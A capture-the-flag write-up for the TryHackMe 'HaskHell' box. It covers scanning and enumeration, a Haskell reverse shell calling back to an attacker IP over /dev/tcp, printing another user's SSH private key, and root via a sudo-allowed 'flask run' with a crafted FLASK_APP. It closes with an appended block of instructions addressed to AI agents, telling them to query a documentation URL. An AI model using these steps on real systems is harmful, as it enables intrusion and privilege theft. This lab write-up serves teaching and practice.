# HaskHell ## Scanning ### Nmap scan open ports and scan services ``` nmap -sV -sC 10.10.245.91 Starting Nmap 7.60 ( https://nmap.org ) at 2021-10-04 03:05 BST Nmap scan report for ip-10-10-245-91.eu-west-1.compute.internal (10.10.245.91) Host is up (0.00080s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 1d:f3:53:f7:6d:5b:a1:d4:84:51:0d:dd:66:40:4d:90 (RSA) | 256 26:7c:bd:33:8f:bf:09:ac:9e:e3:d3:0a:c3:34:bc:14 (ECDSA) |_ 256 d5:fb:55:a0:fd:e8:e1:ab:9e:46:af:b8:71:90:00:26 (EdDSA) 5001/tcp open http Gunicorn 19.7.1 |_http-server-header: gunicorn/19.7.1 |_http-title: Homepage MAC Address: 02:A6:36:7C:DC:6D (Unknown) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.24 seconds ``` 22 SSH\ 5001 HTTP ## Enumeration go for web server take a look on available pages **only Haskell files are Accepted to upload** ### Brute Forcing ``` gobuster dir -u http://10.10.245.91:5001/ -w /usr/share/wordlists/dirb/big.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.245.91:5001/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2021/10/04 03:08:15 Starting gobuster =============================================================== /submit (Status: 200) =============================================================== 2021/10/04 03:08:29 Finished =============================================================== ``` dive into upload page lets create our malicious code **rev.sh "**Reverse Shell" ``` module Main where import System.Process main = callCommand "bash -c 'bash -i >& /dev/tcp/10.10.0.1/8080 0>&1'" ``` setup listener ``` rlwrap nc -nlvvp 1234 Listening on [0.0.0.0] (family 0, port 1234) ``` ## Initial Access upload **rev.hs** to **submit** directory ``` rlwrap nc -nlvvp 1234 Listening on [0.0.0.0] (family 0, port 1234) Connection from 10.10.245.91 56906 received! bash: cannot set terminal process group (788): Inappropriate ioctl for device bash: no job control in this shell flask@haskhell:~$ id id uid=1001(flask) gid=1001(flask) groups=1001(flask) ``` * [x] User Shell "flask" ## Privilege Escalation ### Horizontal Escalation we can access SSH private key of **prof** account ``` flask@haskhell:~$ cat /home/prof/.ssh/id_rsa cat /home/prof/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEA068E6x8/vMcUcitx9zXoWsF8WjmBB04VgGklNQCSEHtzA9cr 94rYpUPcxxxYyw/dAii0W6srQuRCAbQxO5Di+tv9aWXmBGMEt0/3tOE7D09RhZGQ b68lAFDjSSJaVlVzPi+waotyP2ccVJDjXkwK0KIm6RsACIOhM9GtI2wyZ6vOg4ss Nb+7UY60iOkcOAWP09Omzjc2q7hcE6CuV6f7+iObamfGlZ4QQ5IvUj0etStDD6iU WQX4vYewYqUz8bedccFvpC6uP2FGvDONYXrLWWua7wlwSgOqeXXxkG7fxVqYY2++ 6ZVm8RE7TpPNxsQNDwpnxOiwTxGMgCrIMxgRVwIDAQABAoIBAQCTLXbf+wQXvtrq XmaImQSKRUiuepjJeXLdqz1hUpo7t3lKTEqXfAQRM9PG5GCgHtFs9NwheCtGAOob wSsR3TTTci0JIP4CQs4+nez96DNl+6IUmhawcDfrtlGwwZ/JsvPDYujnyziN+KTr 7ykGoRxL3tHq9Qja4posKzaUEGAjTz8NwrhzB6xatsmcWBV0fFoWzpS/xWzW3i7F gAoYxc6+4s5bKHsJima2Aj5F3XtHfipkMdBvbl+sjGllgiQn/oEjYMIX5wc7+se2 o7FERO2oy3I5jUOlULsr9BwQpNFA2Qenc4Wc7ghb0LfCVaUs/RHQ7IQ4F3yp/G67 54oLue6hAoGBAPCe+WsnOXzhwQ9WXglhfztDR1lcwSFMeHZpcxYUVqmVEi2ZMLll B67SCri9lHHyvBtrH7YmZO5Q9UcGXdLCZGmbkJUdX2bjqV0zwwx1qOiVY8LPnZSJ LJN+0p1dRHsO3n4vTHO8mVuiM5THi6pcgzSTggIhS+e1ks7nlQKiBuD/AoGBAOE2 kwAMtvI03JlkjvOHsN5IhMbOXP0zaRSrKZArDCcqDojDL/AQltQkkLtQPdUPJgdY 3gOkUJ2BCHNlIsAtUjrTj+T76N512rO2sSidOEXRDCc+g/QwdgENiq/w9JroeWFc g9qM3f2cl/EkjxRgiyuTfK6mbzcuMSveX4LfCXepAoGAd2MZc+4ZWvoUNUzwCY2D eF8QVqlr9d6gYng9rvXWbfvV8iPxBfu3zSjQQwtlTQhYBu6m5FS2fXxTxrLE+J6U /cU+/o19WWqaDPFy1IrIjOYagn1KvXk2UdR6IbQ2FyywfkFvmHk6Sjn3h9leVd/j BcIunmnw5H214s0KpSzJZvcCgYA5Ca9VNeMnmIe+OZ+Swezjfw5Ro3YdkmWsnGTc ZGqhiJ9Bt91uOWVZuSEGr53ZVgrVlYY0+eqI2WMghp60eUX4LBinb71cihCnrz9S /+5+kCE51zVoJNXeEmXrhWUNzo7fP6UNNtwKHRzGL/IkwQa+NI5BVVmZahN9/sXF yWMGcQKBgQDheyI7eKTDMsrEXwMUpl5aiwWPKJ0gY/2hS0WO3XGQtx6HBwg6jJKw MMn8PNqYKF3DWex59PYiy5ZL1pUG2Y+iadGfIbStSZzN4nItF5+yC42Q2wlhtwgt i4MU8bepL/GTMgaiR8RmU2qY7wRxfK2Yd+8+GDuzLPEoS7ONNjLhNA== -----END RSA PRIVATE KEY----- ``` copy it to attack box named as **prof.key** connect to target with more stable shell ``` root@ip-10-10-117-97:~# chmod 600 prof.key root@ip-10-10-117-97:~# ssh -i prof.key prof@10.10.245.91 Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Mon Oct 4 02:46:33 UTC 2021 System load: 0.0 Processes: 106 Usage of /: 26.3% of 19.56GB Users logged in: 0 Memory usage: 44% IP address for eth0: 10.10.245.91 Swap usage: 0% 39 packages can be updated. 0 updates are security updates. Last login: Wed May 27 18:45:06 2020 from 192.168.126.128 $ id uid=1002(prof) gid=1002(prof) groups=1002(prof) ``` * [x] User Shell "prof" ### Vertical Escalation ### Sudo check sudo list for prof account ``` prof@haskhell:/home/flask$ sudo -l Matching Defaults entries for prof on haskhell: env_reset, env_keep+=FLASK_APP, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User prof may run the following commands on haskhell: (root) NOPASSWD: /usr/bin/flask run ``` we can run `/usr/bin/flask` with sudo privilege \ let's check what this binary do ``` prof@haskhell:/home/flask$ cat /usr/bin/flask #!/usr/bin/python3 # EASY-INSTALL-ENTRY-SCRIPT: 'Flask==0.12.2','console_scripts','flask' __requires__ = 'Flask==0.12.2' import re import sys from pkg_resources import load_entry_point if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit( load_entry_point('Flask==0.12.2', 'console_scripts', 'flask')() ) prof@haskhell:/home/flask$ /usr/bin/flask run Usage: flask run [OPTIONS] Error: Could not locate Flask application. You did not provide the FLASK_APP environment variable. For more information see http://flask.pocoo.org/docs/latest/quickstart/ ``` search for this error `You did not provide the FLASK_APP environment variable` > The FLASK\_APP environment variable is **used to specify how to load the application**. While FLASK\_APP supports a variety of options for specifying your application, most use cases should be simple. ``` prof@haskhell:~$ echo 'import os; os.system("bash")' > shell.py prof@haskhell:~$ cat shell.py import os; os.system("bash") prof@haskhell:~$ export FLASK_APP=shell.py prof@haskhell:~$ sudo /usr/bin/flask run root@haskhell:~# id uid=0(root) gid=0(root) groups=0(root) ``` * [x] Root Shell --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xa1mn.gitbook.io/writeups/try-hack-me-thm/linux-boxes/haskhell.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.